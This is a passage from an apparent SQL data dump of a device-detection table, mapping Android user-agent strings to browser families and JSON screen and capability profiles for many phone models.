Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ALP-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ALP-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ALP-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; AMN-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; AMN-LX2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; AMN-LX3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; AMN-LX9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ANE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ANE-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ANE-LX2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ANE-LX2J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ANE-LX3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ARE-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":748,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ART-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ASUS_A001D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ASUS_I001DC) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ASUS_I001DE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ASUS_I01WD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ASUS_X00HD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ASUS_X00QD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":749,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ASUS_X00QDA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":749,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ASUS_X00QSA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":749,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ASUS_X00TD) AppleWebKit/* (KHTML, like Gecko) Chrome','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ASUS_X00TD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ASUS_X00TDB) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ASUS_X017D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ASUS_X017DA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ASUS_X01AD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ASUS_X01BDA) AppleWebKit/* (KHTML, like Gecko) Chrome','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ASUS_X01BDA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ASUS_Z01QD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ASUS_Z01RD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":749,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Altice S62) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Aquaris X2 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Aquaris X2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Archos Core 62S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_archos','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":664,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Archos Oxygen 63) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_archos','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Armor 5S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":756,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Armor 7E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Armor X5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Armor_3W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Armor_3WT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Armor_6E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":749,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Armor_6S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":749,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Armor_7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Armor_X3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Armor_X6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; BKL-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; BKL-AL20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; BKL-L04) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; BKL-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; BLA-A09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; BLA-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; BLA-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; BLA-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; BND-AL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; BND-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; BQ-5016G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; BQ-5518G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; BQ-5528L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; BQ-5535L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; BQ-5730L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; BQ-5731L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; BQ-6022G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; BQ-6040L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; BQ-6042L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":854,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; BQ-6424L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; BV5500Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; BV5900) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; BV6900) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; BV9100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; BV9500Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; BV9600) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":750,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; BV9600Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":750,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; BV9700Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; BV9800) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; BV9800Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; BV9900) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; C106) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; C13 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":664,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; C15 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":854,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; C16) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; C16_Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; C17 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; C18_Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; C5L) AppleWebKit/* (KHTML, like Gecko) Chrome 